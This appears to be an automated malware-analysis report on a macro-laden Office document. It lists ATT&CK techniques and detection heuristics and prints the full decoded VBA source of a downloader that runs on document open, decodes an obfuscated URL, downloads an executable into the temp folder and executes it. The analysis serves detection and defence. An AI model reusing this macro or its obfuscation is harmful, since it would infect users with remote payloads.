Verdict: MALICIOUS
Risk Score: 258

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
- T1105 Ingress Tool Transfer
The sample contains VBA macros that use URLDownloadToFile to download a second-stage payload into the temporary directory (Environ$("tmp")). The ShellExecute API is then used to execute the downloaded file. The ClamAV detection 'Doc.Downloader.Donoff-6700491-0' further supports the downloader classification. The obfuscated URL string 'ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui', which the macro's Decrypt routine decodes at runtime (reverse the string, then subtract 1 from each character code), is highly suspicious.
Heuristics (8)

- ClamAV: Doc.Downloader.Donoff-6700491-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
  - URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched line in script: `"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _`
  - Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_Open()`
  - Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH`
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 4eba1d0fa2664a2e5ad04d80f626fe0f3dcb7c4215797bd87f8995b2409e81ff) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3018 bytes |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: rCwOyUEPUQd
Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long
Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long
Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH
iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")
loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
rCwOyUEPUQd
End Sub
Private Function Decrypt(enc)
Dim x, i, tmp
enc = StrReverse(enc)
For i = 1 To Len(enc)
x = Mid(enc, i, 1)
tmp = tmp & Chr(Asc(x) - 1)
Next
Decrypt = tmp
End Function
Attribute VB_Name = "NewMacros"
'Macro Name: rCwOyUEPUQd
Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long
Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long
Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH
iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")
loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
rCwOyUEPUQd
End Sub
Private Function Decrypt(enc)
Dim x, i, tmp
enc = StrReverse(enc)
For i = 1 To Len(enc)
x = Mid(enc, i, 1)
tmp = tmp & Chr(Asc(x) - 1)
Next
Decrypt = tmp
End Function
```